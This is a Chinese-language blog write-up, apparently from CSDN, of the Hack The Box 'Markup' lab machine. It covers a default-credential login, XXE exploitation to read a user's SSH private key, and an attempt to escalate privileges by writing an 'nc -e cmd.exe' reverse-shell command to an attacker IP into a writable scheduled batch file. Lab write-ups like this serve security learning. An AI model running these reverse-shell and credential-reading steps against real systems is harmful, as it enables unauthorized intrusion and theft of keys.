[渗透测试]HTB-Markup

0x01信息收集

在这里插入图片描述
nmap 常规扫一波

在这里插入图片描述
开了80 22 443 端口

0x02 先看看80端口

在这里插入图片描述
除了一个登录页面啥也没有
admin
password
成功登录
在这个order 的地方 使用xml传订单。可能存在XXE,xxe是没有对外部实体的安全性验证而导致恶意外部实体被执行,可能导致lfi或者RCE
在这里插入图片描述

在这里插入图片描述
是存在XXE的
在这里插入图片描述
在返回包里看见了疑似账号的名字daniel
又开了22端口 我们可以去读取目标的私钥

地址是c://User/daniel/.ssh/id_rsa

在这里插入图片描述
成功了 我们可以通过ssh登录了
将私钥保存为id_rsa

ssh -i id_rsa daniel@10.129.183.135
在这里插入图片描述
在桌面看见userflag
C盘根目录下看见一个 Log-Management文件夹 进去看 是个脚本
type一下 发现是清理日志用的
在这里插入图片描述
在这里插入图片描述
这里用powershell ps了一下 发现了之前那个进程 可能有定时任务什么的

在这里插入图片描述
icacls 查看文件权限 显示BUILTIN \ Users组具有对该文件的完全控制(F)。 BUILTIN \ Users组代表所有本地用户,其中也包括Daniel

在这里插入图片描述
传一个nc过去 将nc连接语句写入job.bat 并执行

echo c:\Log-Management\nc.exe -e cmd.exe 10.1
0.14.26 1234 > c:\Log-Management\job.bat & job.bat


在这里插入图片描述

获取不到administrator权限,寄!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值